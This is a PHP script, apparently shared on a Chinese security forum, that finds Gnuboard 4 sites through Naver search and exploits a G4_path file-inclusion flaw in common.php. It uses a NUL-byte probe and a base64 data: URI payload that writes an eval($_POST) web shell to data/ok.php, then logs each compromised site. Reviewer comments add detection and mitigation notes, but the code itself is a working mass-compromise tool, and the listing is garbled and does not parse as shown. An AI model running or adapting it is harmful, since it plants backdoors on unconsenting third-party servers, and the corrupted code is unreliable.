Purreth
Still from bangziguo =. =
<? Php
// Driver: prints a banner, then walks 99 pages of search-engine results for the
// query "bbs/board. php" (start offset = ii * 10 + 1, 10 results per page) and
// passes each results page to get().
// NOTE(review): the listing is extraction-damaged (spaces inside variable names,
// capitalised keywords, strings broken across lines) and does not parse as PHP
// as shown; the comments here describe the visible intent only.
// Defender note: this is bulk candidate discovery through a public search engine,
// so any site whose board script is indexed under this path is a potential
// recipient of the probe requests issued further down in fuck().
Echo "+ ---------------------------------------------------------------- + ";
Echo "http://www.t00ls.net ";
Echo "+ ---------------------------------------------------------------- + ";
For ($ ii = 1; $ ii <= 99; $ ii ++)
{
// Result offset for this page of the search listing.
$ C = (int) $ ii * 10 + 1;
$ A = "web.search.naver.com ";
$ B = "/search. naver? Where = webkr & query = bbs/board. php & xc = & docid = 0 & lang = all & st = s & fd = 2 & start = ". $ c. "& display = 10
& Qvt = 0 & sm = tab_pge ";
Get ($ a, $ B );
}
// get($host, $file): fetches one search-results page over a raw socket, extracts
// URLs that end in bbs/board. php, and hands a match to fuck().
// Returns false if the socket cannot be opened; otherwise returns nothing.
Function get ($ host, $ file)
{
// Plain-text connection to port 80 with a 10 second timeout.
$ Fp = fsockopen ($ host, 80, $ errno, $ errstr, 10 );
If (! $ Fp ){
Echo "SocketError: $ errstr ($ errno )";
Return false;
}
// Hand-built request with a fixed browser User-Agent, Referer and Cookie.
// These headers go to the search engine only; the later requests to candidate
// sites are made with file_get_contents() and do not carry them.
$ Get = "GET $ file HTTP/1.1 ";
$ Get. = "Host: $ host ";
$ Get. = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv: 1.8.1.5) Gecko/20070713 Firefox/2.0.0.5 ";
$ Get. = "Referer: http: // $ host ";
$ Get. = "Connection: Close ";
$ Get. = "Cookie: ns_acl_nautocomplete = 1; NB = Beijing; NNB = AIUHYPM7OXJUS; page_uid = fOL9uloi5UNssbPX/M8sss -- 100532; _ naver_usersession _ = Beijing ";
Fwrite ($ fp, $ get );
// Reads the whole response into memory before matching.
$ Response = stream_get_contents ($ fp );
// Collects every URL in the response that ends in bbs/board. php (pattern is
// garbled in this listing).
Preg_match_all ("(http: // [-w.] + (: d + )? (/([W/_.] *)? Bbs/board. php) ", $ response, $ put );
For ($ I = 0; $ I <count ($ put [0]); $ I ++)
{
// NOTE(review): the loop body ends in an unconditional Break, so only the first
// iteration runs and at most one matched URL per results page reaches fuck().
$ A = (int) $ I * 3;
Fuck ($ put [0] [$ a]);
// Echo count ($ put [0]);
// Print_r ($ put [0]);
// Fuck ($ put [0] [$ I]);
Break;
}
Fclose ($ fp );
}
// fuck($OK): given a board URL, tests whether common. php on that site includes a
// path taken from the G4_path request parameter, and if so tries to make it
// write a PHP file under data/ and records the result.
// NOTE(review): the G4_path name and the gnuboard.txt log file suggest the
// Gnuboard 4 board package; confirm against the original advisory.
// Defender notes:
//  - Detection: requests to common. php with G4_path in the query string, in
//    particular values starting with "data:" or containing an encoded NUL byte,
//    and new or unexpected .php files in the board's data/ directory.
//    file_get_contents() sends no User-Agent header unless PHP's user_agent
//    setting is configured, so these requests may arrive without one.
//  - Mitigation: keep register_globals and allow_url_include disabled, keep
//    display_errors off in production (the check below depends on a visible
//    PHP warning), run a PHP version that rejects NUL bytes in file paths,
//    update the board software, and deny PHP execution in upload/data
//    directories at the web-server level.
Function fuck ($ OK)
{
// Site base URL: the board URL with bbs/board. php removed (call is garbled here).
$ A = preg_replace (bbs/board. php), $ OK );
// Probe URL: G4_path set to /tmp followed by an encoded NUL byte and marker digits.
$ File = $ a. "common. php? G4_path =/tmp %002345 ";
// Second URL: G4_path set to a base64 data: URI, i.e. inline PHP supplied as the
// include target. Only effective where PHP permits URL wrappers in include.
$ Xxx = $ a. "common. php? G4_path = data:; base64, PD9mcHV0cyhmb3BlbignLi9kYXRhL29rLnBocCcsJ3crJyksJzw/
CGhwIEBldmFsKCRfUE9TVFtjXSk7ZWNobyAiZnVja3lvdSI7Pz4nKTs/Pg = ";
// Location where the written file is expected to appear.
$ Shell = $ a. "data/OK. php ";
$ Target = parse_url ($ OK );
$ Sitepath = $ target [host];
// Errors suppressed with @; a failed fetch leaves $xx false.
$ Xx = @ file_get_contents ($ file );
// A response containing both "Warning" and "tmp" is treated as proof that the
// parameter reached an include; presumably this matches PHP's failed-include
// warning, so it only works when errors are displayed to the client.
If (eregi ("(Warning)", $ xx) & eregi ("(tmp)", $ xx ))
{
Print $ sitepath. "Vulnerability yes "."";
@ File_get_contents ($ xxx );
$ Oksehll = @ file_get_contents ($ shell );
// Marker digits absent from the warning text: presumably the NUL byte truncated
// the path on this host (pattern is garbled in this listing).
If (! Eregi ("/\ 02345)", $ xx ))
{
Print $ sitepath. "% 00 OK "."";
}
// The written file echoes a fixed marker string; finding it confirms that the
// file exists and executes.
If (eregi ("(fuckyou)", $ oksehll ))
{
Print $ shell. "pass: c "."";
$ Axx = "". $ shell;
// NOTE(review): garbled line; presumably opens gnuboard.txt in append mode as
// $sh, which the next two lines write to and close.
Mongoshadefopen(gnuboard.txt, "a + ");
Fwrite ($ sh, $ axx );
Fclose ($ sh );
}
}
Else
{
Print $ sitepath. "Vulnerability no "."";
}
}
?>